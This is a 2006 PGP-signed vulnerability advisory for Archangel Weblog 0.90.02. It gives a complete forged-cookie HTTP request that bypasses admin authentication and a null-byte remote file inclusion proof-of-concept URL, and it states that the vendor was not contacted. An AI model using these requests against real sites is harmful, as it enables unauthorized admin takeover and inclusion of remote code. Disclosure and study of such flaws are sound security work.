-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 KingOfSka - http://www.cpc.info.ms Contro Potere Crew Advisories #5 26/02/2006 http://www.archangelmgt.com/ Archangel Weblog 0.90.02 Admin Authentication Bypass & Remote File Inclusion ######################################################### #1:. Background : Archangel Weblog is a new, full featured weblog application. Written in PHP and using a MySQL database backend, Archangel Weblog is easy to install, easy to configure and customize, and easy to use for most anyone. #2:. The Bug : The bug is caused by an insufficient filtering of user submitted input.A malicious user, could easily forge cookies to obtain unauthorized administrator credentials, and trhough the administration panel is possible to perform a Local\Remote File Inclusion. #3:. Exploiting : To get administrator access to the weblog script, just use a get request like this: [http get request] GET http://127.0.0.1/awb/admin/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: ba_admin=1 Cache-Control: max-age=0 [/http get request] or just add the cookie to your request.. Now, take a look at /admin/index.php , line 54: So, arbitrary file inclusion is possible, by using NULL char to filter out the .php extension. PoC: http://127.0.0.1/awb/admin/index.php?index=http://www.google.it%00 #4:. Vendor Status / Patch : No Contact #5:. Links : http://contropotere.netsons.org/kingofska.asc - Public GnuPG Key http://contropotere.netsons.org - Contro Potere Crew Forums , here you can ask for an unofficial patch or for more info. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iQEVAwUBRAGtT3X+WtVr4QeuAQLX7wf+Jlgo5XekN+Bccqh7rl/5NJEcGkdWBtRo aQRzveUw2NYVdeBSTCszsSfWwW2fiAfPqWqQTQlrzNQNvka2Q34MO1qBxZ//6L0L Cu8GrAbNIUwb8jeK4nOLSG9hoBJ/2Nh+GRk4C39Rqtr7i5kQl28Ca4MDi21eID2K u/K7dWQlIFrQcfHPUSFjGNTdMu5mHycKmUEl52KYdofUG5pHDW0cX4deZNcc93L8 ZNMFKCXL6XM0x42/xdmUWpP0ySMpMVoRJxpGS1WCUtpTqorPQPq025ZIB91l9E8j x9UaRiRzy4mS7kTN5+mOl/3yZUoN+KsFo9HY7WPL3BBD2Z+wAU2Wbg== =bJwT -----END PGP SIGNATURE-----